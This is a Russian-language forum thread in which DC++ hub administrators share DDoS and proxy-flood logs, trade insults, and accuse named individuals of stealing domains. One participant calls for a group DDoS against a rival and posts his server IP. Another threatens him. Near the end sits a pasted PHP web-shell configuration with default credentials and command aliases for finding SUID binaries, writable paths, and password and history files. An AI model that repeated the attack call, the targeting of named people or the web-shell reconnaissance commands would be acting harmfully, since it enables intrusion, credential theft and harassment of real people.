[2016-04-13 00:31:31] Внимание! Обнаружена атака с помощью юзеров других хабов. Всего запросов: 20. Адреса хабов, участвующих в атаке:
dchub://ozerki.org (7 запросов)
dchub://dc.milenahub.ru (2 запросов)
Неизвестно (4 запросов)
dchub://dc.cifracom.ru (6 запросов)
[2016-04-13 00:31:31] Стал известен еще один адрес атакующего хаба: dchub://ozerki.org/
[2016-04-13 00:31:31] Стал известен еще один адрес атакующего хаба: dchub://milenahub.ru
[2016-04-13 00:31:31] Стал известен еще один адрес атакующего хаба: dchub://185.11.146.194
[2016-04-13 00:31:32] Стал известен еще один адрес атакующего хаба: dchub://pikabu.ddns.net
[2016-04-13 00:31:32] Стал известен еще один адрес атакующего хаба: dchub://dc.cifracom.ru.
[2016-04-13 00:31:33] Стал известен еще один адрес атакующего хаба: dchub://pikabu.ddns.net:411/
[2016-04-13 00:31:34] Стал известен еще один адрес атакующего хаба: dchub://dc.ch6.ru
[2016-04-13 00:31:34] Стал известен еще один адрес атакующего хаба: dchub://vh.setitagila.ru
[2016-04-13 00:31:36] Стал известен еще один адрес атакующего хаба: dchub://dc.ozerki.org
[2016-04-13 00:31:38] Стал известен еще один адрес атакующего хаба: dchub://dc.milenahub.ru/
[2016-04-13 00:31:52] Стал известен еще один адрес атакующего хаба: dchub://http://dc.cifracom.ru
[2016-04-13 00:38:58] Атака, продолжавшаяся 7 минут 27 секунд, завершена. Всего запросов: 33571. Число запросов за 447 сек.: 33571. Среднее число запросов в минуту: 4506. Адреса хабов, участвовавших в атаке:
dchub://pikabu.ddns.net:411/ (3 запросов)
dchub://dc.cifracom.ru. (28 запросов)
dchub://http://dc.cifracom.ru (9 запросов)
dchub://dc.milenahub.ru/ (43 запросов)
dchub://dc.cifracom.ru (8949 запросов)
Неизвестно (9467 запросов)
dchub://ozerki.org/ (62 запросов)
dchub://ozerki.org (8206 запросов)
dchub://dc.milenahub.ru (6269 запросов)
dchub://milenahub.ru (307 запросов)
dchub://185.11.146.194 (132 запросов)
dchub://vh.setitagila.ru (12 запросов)
dchub://pikabu.ddns.net (51 запросов)
dchub://dc.ch6.ru (6 запросов)
dchub://dc.ozerki.org (23 запросов)
slav писал(а):
И вообще, если жаловаться, то жалуйся сразу в СанЭпидемСтанцию. Они лучше умеют блокировать домены и IP-адреса.
Узнай свой номер телефона по калькулятору!
1. Берём калькулятор
2. Вводим 3 первые цифры вашего номера телефона (без всяких кодов и т.п.)
3. Умножаем на 80
4. Прибавляем 1
5. Умножаем на 250
6. Прибавляем 4 последние цифры вашего номера телефона
7. Прибавляем 4 последние цифры вашего номера телефона ещё раз
8. Отнимаем 250
9. Делим на 2
10.Офигеваем
Скидываю простой лог ддос, понимаю, что это недоказательство, поверьте, есть другие доказательства: https://yadi.sk/d/TiZWsGMNrDied
Лучше скачать, что бы нормально прочитать.
А Лично для Александра Шандала (KCAHDEP) у меня есть пакет доказательств.. Кстати интересная связь прорисовывается с Интелом.
Нездоровая активность замечена дважды за последние дни. Вот пример какой-то атаки с попытками входа под кучей прокси в течение 20 минут по 1-3 попытке за секунду. Вот пример: Спойлер
[2016-07-25 16:06] [16:06:10] <CMИT> PROXY: jt2j0W c IP 94.23.194.104. Способ обнаружения: список адресов. IP забанен на 14 дней
[2016-07-25 16:06] [16:06:14] <CMИT> PROXY: x6Yw951 c IP 68.42.222.51. Способ обнаружения: список адресов. IP забанен на 14 дней
[2016-07-25 16:06] [16:06:14] <CMИT> PROXY: VZ86xjMIZ(USA) c IP 189.80.33.47. Способ обнаружения: список адресов. IP забанен на 14 дней
[2016-07-25 16:06] [16:06:15] <CMИT> PROXY: 06UH c IP 180.87.210.183. Способ обнаружения: список адресов. IP забанен на 14 дней
[2016-07-25 16:06] [16:06:16] <CMИT> PROXY: 5JG4iQj(MODEM) c IP 95.173.170.215. Способ обнаружения: список адресов. IP забанен на 14 дней
[2016-07-25 16:06] [16:06:17] <CMИT> PROXY: (wifi)anLPGmP c IP 177.37.231.96. Способ обнаружения: список адресов. IP забанен на 14 дней
[2016-07-25 16:06] [16:06:17] <CMИT> PROXY: nor-7iiN7GcrL c IP 176.102.86.166. Способ обнаружения: список адресов. IP забанен на 14 дней
[2016-07-25 16:06] [16:06:18] <CMИT> PROXY: k4FvFpnEW c IP 187.19.199.98. Способ обнаружения: список адресов. IP забанен на 14 дней
[2016-07-25 16:06] [16:06:18] <CMИT> PROXY: [10mbit]h3MyYG5 c IP 177.67.38.146. Способ обнаружения: список адресов. IP забанен на 14 дней
[2016-07-25 16:06] [16:06:19] <CMИT> PROXY: DIG c IP 163.172.38.175. Способ обнаружения: список адресов. IP забанен на 14 дней
[2016-07-25 16:06] [16:06:19] <CMИT> PROXY: [RDS]YMkWY c IP 69.27.134.240. Способ обнаружения: список адресов. IP забанен на 14 дней
[2016-07-25 16:06] [16:06:19] <CMИT> PROXY: PgyV9(10MBIT) c IP 191.102.245.83. Способ обнаружения: список адресов. IP забанен на 14 дней
[2016-07-25 16:06] [16:06:19] <CMИT> PROXY: UNET-2OP c IP 82.151.200.196. Способ обнаружения: список адресов. IP забанен на 14 дней
[2016-07-25 16:06] [16:06:20] <CMИT> PROXY: 100/100-vM4jZ3 c IP 187.19.202.118. Способ обнаружения: список адресов. IP забанен на 14 дней
[2016-07-25 16:06] [16:06:21] <CMИT> PROXY: AjwQ9K6 c IP 189.80.33.183. Способ обнаружения: список адресов. IP забанен на 14 дней
[2016-07-25 16:06] [16:06:22] <CMИT> PROXY: 5HcA c IP 177.92.142.175. Способ обнаружения: список адресов. IP забанен на 14 дней
[2016-07-25 16:06] [16:06:22] <CMИT> PROXY: (FI)Ais c IP 217.112.100.131. Способ обнаружения: список адресов. IP забанен на 14 дней
[2016-07-25 16:06] [16:06:22] <CMИT> PROXY: (RUS)tX7XDKf c IP 191.102.245.83. Способ обнаружения: список адресов. IP забанен на 14 дней
[2016-07-25 16:06] [16:06:23] <CMИT> PROXY: 0jQ(Adsl) c IP 116.251.219.237. Способ обнаружения: список адресов. IP забанен на 14 дней
[2016-07-25 16:06] [16:06:23] <CMИT> PROXY: reh c IP 43.229.225.163. Способ обнаружения: список адресов. IP забанен на 14 дней
[2016-07-25 16:06] [16:06:25] <CMИT> PROXY: EDuCJ c IP 158.46.67.100. Способ обнаружения: список адресов. IP забанен на 14 дней
[2016-07-25 16:06] [16:06:27] <CMИT> PROXY: HjzurpX[lv] c IP 103.38.202.66. Способ обнаружения: список адресов. IP забанен на 14 дней
[2016-07-25 16:06] [16:06:27] <CMИT> PROXY: IdJ c IP 81.21.74.143. Способ обнаружения: список адресов. IP забанен на 14 дней
[2016-07-25 16:06] [16:06:27] <CMИT> PROXY: YlT5 c IP 117.239.212.50. Способ обнаружения: список адресов. IP забанен на 14 дней
[2016-07-25 16:06] [16:06:28] <CMИT> PROXY: 4gPX c IP 177.92.141.97. Способ обнаружения: список адресов. IP забанен на 14 дней
[2016-07-25 16:06] [16:06:29] <CMИT> PROXY: 4oPB7za62(WIFI) c IP 94.23.2.127. Способ обнаружения: список адресов. IP забанен на 14 дней
[2016-07-25 16:06] [16:06:29] <CMИT> PROXY: eyG8 c IP 182.92.75.193. Способ обнаружения: список адресов. IP забанен на 14 дней
[2016-07-25 16:06] [16:06:30] <CMИT> PROXY: VqPERjS[10/10] c IP 81.18.49.178. Способ обнаружения: список адресов. IP забанен на 14 дней
[2016-07-25 16:06] [16:06:30] <CMИT> PROXY: 5rNM8yhnt[MIR] c IP 8.17.62.196. Способ обнаружения: список адресов. IP забанен на 14 дней
[2016-07-25 16:06] [16:06:31] <CMИT> PROXY: LNQOj[Hun] c IP 177.105.237.232. Способ обнаружения: список адресов. IP забанен на 14 дней
[2016-07-25 16:06] [16:06:31] <CMИT> PROXY: [UNET]t7ans5b c IP 43.224.180.5. Способ обнаружения: список адресов. IP забанен на 14 дней
[2016-07-25 16:06] [16:06:31] <CMИT> PROXY: LpH-100mbit c IP 89.186.21.104. Способ обнаружения: список адресов. IP забанен на 14 дней
[2016-07-25 16:06] [16:06:31] <CMИT> PROXY: Wf8o8 c IP 180.169.19.170. Способ обнаружения: список адресов. IP забанен на 14 дней
[2016-07-25 16:06] [16:06:33] <CMИT> PROXY: Wg42b c IP 103.51.34.102. Способ обнаружения: список адресов. IP забанен на 14 дней
[2016-07-25 16:06] [16:06:33] <CMИT> PROXY: a7uj c IP 109.238.42.167. Способ обнаружения: список адресов. IP забанен на 14 дней
[2016-07-25 16:06] [16:06:34] <CMИT> PROXY: h9f c IP 201.220.18.3. Способ обнаружения: список адресов. IP забанен на 14 дней
[2016-07-25 16:06] [16:06:37] <CMИT> PROXY: PjOa6hpN(GTK) c IP 168.167.141.27. Способ обнаружения: список адресов. IP забанен на 14 дней
[2016-07-25 16:06] [16:06:37] <CMИT> PROXY: VVhj c IP 50.62.81.206. Способ обнаружения: список адресов. IP забанен на 14 дней
[2016-07-25 16:06] [16:06:38] <CMИT> PROXY: Mir_7sy9ovCh c IP 74.51.164.153. Способ обнаружения: список адресов. IP забанен на 14 дней
[2016-07-25 16:06] [16:06:38] <CMИT> PROXY: nIDjIlbA(NO) c IP 23.226.85.52. Способ обнаружения: список адресов. IP забанен на 14 дней
[2016-07-25 16:06] [16:06:39] <CMИT> PROXY: GKd c IP 124.248.226.226. Способ обнаружения: список адресов. IP забанен на 14 дней
[2016-07-25 16:06] [16:06:39] <CMИT> PROXY: 8Xu2hq c IP 144.76.167.106. Способ обнаружения: список адресов. IP забанен на 14 дней
[2016-07-25 16:06] [16:06:39] <CMИT> PROXY: 10/10-RLK c IP 115.28.209.78. Способ обнаружения: список адресов. IP забанен на 14 дней
[2016-07-25 16:06] [16:06:39] <CMИT> PROXY: RrCk c IP 123.56.130.77. Способ обнаружения: список адресов. IP забанен на 14 дней
[2016-07-25 16:06] [16:06:40] <CMИT> PROXY: YAse c IP 121.40.176.6. Способ обнаружения: список адресов. IP забанен на 14 дней
[2016-07-25 16:06] [16:06:40] <CMИT> PROXY: Z7a_ADSL c IP 1.234.4.23. Способ обнаружения: список адресов. IP забанен на 14 дней
[2016-07-25 16:06] [16:06:40] <CMИT> PROXY: fvDId2 c IP 176.101.225.235. Способ обнаружения: список адресов. IP забанен на 14 дней
[2016-07-25 16:06] [16:06:40] <CMИT> PROXY: vdEYq c IP 67.253.68.225. Способ обнаружения: список адресов. IP забанен на 14 дней
[2016-07-25 16:06] [16:06:41] <CMИT> PROXY: wxOv[GB] c IP 50.63.138.51. Способ обнаружения: список адресов. IP забанен на 14 дней
[2016-07-25 16:06] [16:06:41] <CMИT> PROXY: I5yrit c IP 95.110.168.108. Способ обнаружения: список адресов. IP забанен на 14 дней
[2016-07-25 16:06] [16:06:41] <CMИT> PROXY: EgRdHw8uG c IP 5.196.23.166. Способ обнаружения: список адресов. IP забанен на 14 дней
[2016-07-25 16:06] [16:06:42] <CMИT> PROXY: iiUHUWR[mir] c IP 106.187.49.249. Способ обнаружения: список адресов. IP забанен на 14 дней
[2016-07-25 16:06] [16:06:42] <CMИT> PROXY: 7mAVH3N c IP 95.181.96.204. Способ обнаружения: список адресов. IP забанен на 14 дней
В итоге этой атаки (2 раза по 20 минут) скрипт отловил порядка 800 попыток захода через прокси и забанил эти IP. Часть непонятных пользователей прорвалось на хаб и каким-то образом был спровоцирован бан 1200 невинных пользователей по причине "Флуд данными" - это автоматически отлавливает PtokaX... Видимо прорвавшиеся через прокси провоцировали трафик с невинными пользователями ,которых и банило автоматически.
Пишу на всякий случай, чтобы знали, что и такое может быть. Впервые с таким столкнулся.
Если доссят за спам, то правильно делают.
Лучше грохнуть хаб спамера, чем дожидаться пока эта свинья не засрёт всё лички пользователей своими спамерскими гомно-скриптами.
Грохнуть хаб спамера — это только польза для пользователей и других админов.
slav писал(а):Если доссят за спам, то правильно делают.
Лучше грохнуть хаб спамера, чем дожидаться пока эта свинья не засрёт всё лички пользователей своими спамерскими гомно-скриптами.
Грохнуть хаб спамера — это только польза для пользователей и других админов.
А если едят, когда хотят есть и срут, когда хотят срать, то это тоже правильно Мое предложение выше равнозначно твоему... Спасибо Кэп!
Господа, ваши сообщения не в тему. Ни о каком спаме и флуде с моего или другого хаба речь не шла. Я привел пример новой никчемной атаки, чтобы другие знали, что такое может быть и предвидели пути защиты
Еще раз вкратце опишу. В течение 10-20 минут на хаб ломится толпа левых юзеров через прокси. Прокси берутся из открытых источников, так что можно настроить блокировку. За это время может зайти порядка 1000-2000 пользователей через прокси. Эти пользователи генерят мусорный трафик с конкретными нормальными пользователями. В результате этого трафика направленного на конечных нормальных пользователей страдают только нормалтные пользователи - их автоматически банит за флуд данными. В результате нормальные пользователи, забаненные за флуд перенаправляются на другой хаб (это перенаправление определено в настройке хаба).
Итог: нормальные пользователи забанены и перенаправлены на другой хаб. Часть из них возмущены и не понимают, что произошло и за что их забанили.
Alexandr писал(а):Ни о каком спаме и флуде с моего или другого хаба речь не шла. Я привел пример новой никчемной атаки, чтобы другие знали, что такое может быть и предвидели пути защиты
Не учи отца ебаться.
Я достаточно хорошо знаю Ксандера.
От него можно ожидать всё, что угодно, но если он написал что было за дело, значит за дело. Такие вещи просто так не делаются. Значит заслужил.
А всяких плакс, что его обидели, за более 10 лет админом, я до хуя повидал.
Не сри людям — и тебя не тронут.
slav писал(а): От него можно ожидать всё, что угодно, но если он написал что было за дело, значит за дело. Такие вещи просто так не делаются. Значит заслужил.
Где логика после фразы "От него можно ожидать всё, что угодно"? Где последовательность мысли?
Общаться с шизофрениками нет желания... И времени До свидания.
[2016-09-12 09:23] пожалуйста поменяй мне адрес там где Mellon DC Hub на dczone.ru
[2016-09-12 09:24] этот старый адрес хаба у меня украли. цупрус украл Михаил они с Интелом Ильей из волгограда. два друга мошенника
[2016-09-12 09:24] вернее михаил Cyprys с королева
[2016-09-12 12:22] <[Koptevo]Julia> привет! я тебе очень сочувствую!
[2016-09-12 12:25] <[Koptevo]Julia> я зашла к тебе
[2016-09-12 12:26] <[Koptevo]Julia> сейчас у себя дам рекламу твоего хаба с новым адресом
[2016-09-12 13:21] привет, спасибо большое))
[2016-09-12 13:21] а к тебе в админы в опы можно на хаб?
[2016-09-12 14:15] <[Koptevo]Julia> давай позже решим этот вопрос, ладно?
[13:59:20] <[Koptevo]Julia> привет
[13:59:28] <[Koptevo]Julia> скайпа у меня нет
[13:59:56] <[Koptevo]Julia> я пока без пароля у тебя сижу
[14:00:19] <[Koptevo]Julia> простым юзером, чтобы у этих молодчиков не было соблазна опять рушить твой хаб
[14:00:55] <[Koptevo]Julia> дунбар с востока
[14:01:13] <[Koptevo]Julia> он кстати мне помогал, когда на меня нападали сипрус и интел
[14:01:52] <[Koptevo]Julia> японец давно хаб закрыл, он писал в сети, всех предупредил и попрощался
[14:02:09] <[Koptevo]Julia> я думала, что он на хаб ко мне заходить будет, но он совсем пропал...
[14:02:34] <[Koptevo]Julia> если будешь с ним общаться - передавай привет, скажи, что буду рада, если он изредка хотя бы будет заходить к нам
[14:03:06] <[Koptevo]Julia> как отомстить этим ддосерам... я не знаю... к сожалению
[14:03:38] <[Koptevo]Julia> я бы тоже отомстила... они никак не успокоятся, не так давно пытались с моими админами общаться...
[14:03:52] <[Koptevo]Julia> причем, наглые такие, даже ники не меняют
[14:04:48] <[Koptevo]Julia> можешь с админами пообщаться, может, кто нибудь что и присоветует по поводу этих ддосеров
[14:05:16] <[Koptevo]Julia> но мы не стали с ними связываться, правда наш хаб не сильно потрепали, мы восстановились
[14:05:27] <[Koptevo]Julia> вот так...
[16:20:05] <[Koptevo]Julia> но адрес этого хаба вроде бы многие знают
[16:20:30] скоро здесь очень мало людей останется вообще в дс+=
[16:20:33] к стати знаешь
[16:20:40] тебе следует на это обратить внимание
[16:20:54] [2016-09-13 16:04] New AH - adcs://adc.dc-planet.ru:4112 New CS1.6 - csp.soviettime.ru:27015 New SITE - http://dc2.dc-planet.ru
[14:05:09] <Цербер> !userub |
[16:02:44] *** БольшаяКошкаПоприветствуем нового зарегистрировавшегося участника - malta01 !
[16:22:35] <Tsd> забаньте вы уже этого приватного спамера
[16:24:19] <[Koptevo]Julia> да я только увидела, Сереж..... привет
[16:24:53] <Mellon> [2016-09-13 16:04] <malta01> New AH - adcs://adc.dc-planet.ru:4112 New CS1.6 - csp.soviettime.ru:27015 New SITE - http://dc2.dc-planet.ru --- IKrKP
- [2016-09-13 16:04] <Mellon> I'm away. State your business and I might answer later if you're lucky.
- [2016-09-13 16:16] <malta01> New AH - adcs://adc.dc-planet.ru:4112 New CS1.6 - csp.soviettime.ru:27015 New SITE - http://dc2.dc-planet.ru --- eDvsD
- [16:20:13] <malta01> New AH - adcs://adc.dc-planet.ru:4112 New CS1.6 - csp.soviettime.ru:27015 New SITE - http://dc2.dc-planet.ru --- ccbgD
- [16:20:13] <Mellon> I'm away. State your business and I might answer later if you're lucky.
[16:25:32] <Tsd> [Koptevo]Julia: приветик
[16:25:41] <Mellon> дс планет это новый домен цупруса. который он украл ещё он украл мой старый адрес от моего хаба Mellon DC Hub .
[16:26:12] <Mellon> ворует домены он на уровне регистратора. здесь хаб выполнен на айпи адресах dchub://10.10.200.34 - dchub://217.78.182.159 - кошкин дом вот и украсть не может
[16:27:11] <Mellon> найти бы его в реале и в табло бы ему прописать или все вместе ддосте его как они нас досили без причины вообще и наших провайдеров травили, чем быстрее их сервак загнется тем лучше нам !
[16:27:31] <Mellon> будет нечего им тогда рекламировать
[16:27:38] <Tsd> на моём:
- [15:41:47] <=Вышибала=> Bot with IP [136.243.196.12]DE blocked: malta01
[16:27:47] <Mellon> ага тоже метла
[16:31:03] <Mellon> адрес хоста купруса куда идет его сервер с нашими крадеными доменами 78.155.209.108
[16:32:27] <Tsd> школота короче
Уважаемая администрация Хаблиста от именни сообщества DC Коммюинити - пожалуйста забанте все хабы с наворованными доменами Купруса и ныне украденный им хаб ДС-Планет, где цупрус выдает себя за его администратора, к тому же этот даун пытается продавать нам наши же домены, показывает одно а на самом деле продает прилежащий домен !
а что там подробнее, ослы и долбоебы операторы. к примеру ник админа осел, он его подделывает как оcел и пишет опам что типа идет обновление софта, скриптов и тд, и требует их пароля для обновления в "скриптах" ослы операторы ведутся
Последний раз редактировалось KCAHDEP 13 сен 2016, 19:48, всего редактировалось 1 раз.
slav писал(а):Меня интересует кража домена, а не всё остальное.
Кто осёл, я и так знаю.
Ты мне покажи хоть одного нормального, который ещё остался в DC++
ты меня спрашиваешь как, правда такой наивный^(да как 2 пальца обоссать ) под столбом читать пробовал http://dchublist.ru/hubs/3092/
Gedeonych 21 июля в 17:23
А чего все так расплакались та? Ципрус, мы тебя просто в асфальт закатаем вместе с контрОвским серваком и лишишься денежки (если она тебе конечно текёть с контрЫ) Мне чего то начинает не нравиться твоё поведение )
ЭТО КОНТОРА
1. Никита(Скул - Украина)- предположительно хозяин конторы или уж не знаю какое он там отношение к этой конторе имеет но имеет точно.
2. Илья(Интел г.Волгоград) - корм конторы, поиск лохов, скупка , перекупка, перепродажа доменов, отберем у вас домен за 100р перепродадим его вам за 1000р
3. Михаил (Cyprus г.Королёв) - админ конторы
использование хостов конторы для ДДОС атак, распространение троянов имя-фамилия агента сотрудника Reg.ru полностью идентична с именем фамилиец Cyprus , в ДС++ стилистика общения по протоколу, когда его нет на месте непонятно кто отвечает но не автоответчик - стиль конторы , типа подождите Миша отошел обедать (многое видно и ощущается где 100% это или компьютерный клуб, или хостинг-регистратор) . Много лет назад ко мне на хаб приходил какой то мужик, очень мечтал со мной познакомится какой то хозяин Хостинг-Регистратора. он сказал давай тебя запищем но у меня была проблема с доками, по этому потом нашелся чудесный Миша которого прописали в контору - с тех пор чудеса так и творятся а именно Миша ни хуя не делает того что должен делать, ковыряет в попе пальцем , всеми днями играет в игры в конторе за это он имеет очень даже сверх приличную ЗП а еще частенько использует сервера конторы для ДОСА, сам Миша очень умный , на столько что сайт уже один сайт конторы делает более 7 лет и все никак при бесконечном спонсировании и инвестировании МИШЫ . А ещё досит кошку dchub://10.10.200.34 - dchub://217.78.182.159 , чего к Юльке то прилип
Это просто "КОНТОРА" контора в которую посадили детей в надежде на их адекватность и что они окажутся такими гениями и вундеркиндами как я но они ими не оказались и хоронят контору, по этому дети решили воспользоваться серверами и оборудованием конторы для заработка(т.е кидалами и мошенничества за счет привилегий конторы) - так что теперь контора гниет и воняет и её пора закрывать !
так - скорее всего>загрузить на сотрудник регистратор рабочего стола или в веб север-
злоупотребление должностных-администраторских полномочий
<?php
/*
$Id: telnet.class.php,v 1.2 2004/03/22 10:01:35 mb Exp $
Originally written by Marc Ennaji (in french),
modified by Matthias Blaser <mb@adfinis.ch>
- translated most function- and variable names from french to english
- added get_buffer-method to get results of the last command
sent to server
- added hack to get socket_strerror working on old systems
You can find the original class which this translation is based on
on this url: http://px.sklar.com/code.html?id=634
The original class includes a small documentation about using it
in your own applications, but be aware, all functions are in french there, this
one is partly translated.
*/
// hack to get socket_strerror working on old systems
# Settings
# all configurations here
$auth = 1; // set this to 0 to switch authentication off
$login = 'admin';
$password = 'http';
$errors = 0; // set this to 1 to switch php errors on
$stringnum = 1; // change it to 0, if you don't need string numbers in file viewer
$hexdump_rows=20; // number of rows in hexdump
$alias=array( // aliases for shell. edit them if you need.
'find suid files'=>'find / -type f -perm -04000 -ls',
'find suid files in current dir'=>'find . -type f -perm -04000 -ls',
'find sgid files'=>'find / -type f -perm -02000 -ls',
'find sgid files in current dir'=>'find . -type f -perm -02000 -ls',
'find config.inc.php files'=>'find / -type f -name config.inc.php',
'find config.inc.php files in current dir'=>'find . -type f -name config.inc.php',
'find config* files'=>'find / -type f -name "config*"',
'find config* files in current dir'=>'find . -type f -name "config*"',
'find all writable files'=>'find / -type f -perm -2 -ls',
'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
'find all writable directories'=>'find / -type d -perm -2 -ls',
'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
'find all writable directories and files'=>'find / -perm -2 -ls',
'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
'find all service.pwd files'=>'find / -type f -name service.pwd',
'find service.pwd files in current dir'=>'find . -type f -name service.pwd',
'find all .htpasswd files'=>'find / -type f -name .htpasswd',
'find .htpasswd files in current dir'=>'find . -type f -name .htpasswd',
'find all .bash_history files'=>'find / -type f -name .bash_history',
'find .bash_history files in current dir'=>'find . -type f -name .bash_history',
'find all .mysql_history files'=>'find / -type f -name .mysql_history',
'find .mysql_history files in current dir'=>'find . -type f -name .mysql_history',
'find all .fetchmailrc files'=>'find / -type f -name .fetchmailrc',
'find .fetchmailrc files in current dir'=>'find . -type f -name .fetchmailrc',
'list file attributes on a Linux second extended file system'=>'lsattr -va',
'show opened ports'=>'netstat -an',
);
больше ничего сказать не могу но 1000% знаю что "КОНТОРА" так как Cyprus мне лично давал доступ от удаленки его конторский серверов, за это время у меня была возможность посмотреть и 100 раз убедиться с 1000% вероятностью в том что контора и с менее вероятностью но вероятностью актуальной в том что Купрус там ничего не арендует на самом деле, он там работает и я даже не уверен в том что он тот за кого себя выдает !